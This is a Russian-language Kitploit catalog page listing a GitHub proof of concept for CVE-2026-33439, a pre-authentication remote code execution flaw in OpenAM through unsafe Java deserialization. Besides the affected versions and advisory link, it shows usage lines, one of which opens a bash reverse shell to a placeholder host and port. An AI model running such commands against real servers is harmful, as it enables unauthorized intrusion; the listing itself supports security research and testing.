Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33439-Poc — PoC для CVE-2026-33439 — pre-auth RCE в OpenAM через небезопасную десериализацию Java. | Kitploit
Инструменты/GitHubGitHub/rh33t/cve-2026-33439-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubrh33t/cve-2026-33439-poc

CVE-2026-33439-Poc

PoC для CVE-2026-33439 — pre-auth RCE в OpenAM через небезопасную десериализацию Java.

Репозиторий
15 ч 17 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33439

RCE до аутентификации в OpenIdentityPlatform OpenAM через небезопасную десериализацию Java параметра jato.clientSession. Затронуты версии <= 16.0.5, исправлено в 16.0.6.

Рекомендация: https://github.com/OpenIdentityPlatform/OpenAM/security/advisories/GHSA-2cqq-rpvq-g5qj

Использование

root@kitploit:~
time ./cve-2026-33439.py --url https://TARGET/openam --command 'sleep 3' # takes about 3 seconds
./cve-2026-33439.py --url https://TARGET/openam --command 'bash -i >& /dev/tcp/HOST/PORT 0>&1'

Вывод слепой. Запрос блокируется до завершения команды, поэтому время подтверждает выполнение (--command 'sleep 5' занимает около 5 с).

Только для авторизованного тестирования безопасности.

Скачать инструмент